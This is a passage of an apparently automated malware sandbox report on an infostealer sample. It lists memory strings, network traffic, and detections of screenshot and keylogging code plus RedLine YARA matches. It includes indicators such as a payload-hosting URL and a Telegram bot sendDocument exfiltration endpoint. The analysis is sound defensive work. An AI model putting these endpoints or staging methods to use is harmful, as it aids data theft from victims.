00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2062232387.000000007ECEA000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.000000002069D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2098429794.00000000218E0000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp, rpkhzpuO.pif.4.dr	String found in binary or memory: http://ocsp.comodoca.com0$
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: powershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002EFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002EFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: powershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2191894741.0000000004C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: x.exe, 00000004.00000003.2058015103.00000000218ED000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2016123809.000000007F370000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000000.2012623457.0000000000401000.00000020.00000001.01000000.00000004.sdmp, rpkhzpuO.pif, 00000007.00000002.2099220238.0000000000C40000.00000040.00000400.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000002.2099220238.0000000001220000.00000040.00000400.00020000.00000000.sdmp, PO#5_Tower_049.bat, Oupzhkpr.PIF.4.dr, x.exe.2.dr	String found in binary or memory: http://team-x.ru/
Source: powershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2062232387.000000007ECEA000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.000000002069D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2098429794.00000000218E0000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp, rpkhzpuO.pif.4.dr	String found in binary or memory: http://www.pmail.com0
Source: powershell.exe, 0000000A.00000002.2191894741.0000000004C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: rpkhzpuO.pif, 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: powershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: x.exe, 00000004.00000002.2065211434.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lwaziacademy.com/
Source: x.exe, 00000004.00000002.2084775206.000000002070D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lwaziacademy.com/wps/200
Source: x.exe, 00000004.00000002.2065211434.00000000005A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lwaziacademy.com/wps/200_Oupzhkprnvw
Source: x.exe, 00000004.00000002.2065211434.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lwaziacademy.com:443/wps/200_OupzhkprnvwB
Source: powershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Microsofts.exe, 00000009.00000002.3264032203.00000000012F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/
Source: rpkhzpuO.pif, 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002E91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.1d
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

HTTPS traffic detected: 41.185.8.252:443 -> 192.168.2.5:49705 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: Microsofts.exe.7.dr, UltraSpeed.cs	.Net Code: TakeScreenshot
Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, UltraSpeed.cs	.Net Code: TakeScreenshot
Source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, UltraSpeed.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: Microsofts.exe.7.dr, UltraSpeed.cs	.Net Code: VKCodeToUnicode
Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, UltraSpeed.cs	.Net Code: VKCodeToUnicode
Source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, UltraSpeed.cs	.Net Code: VKCodeToUnicode

Source: Yara match	File source: Process Memory Space: x.exe PID: 2788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rpkhzpuO.pif PID: 6480, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.1.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 23.1.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
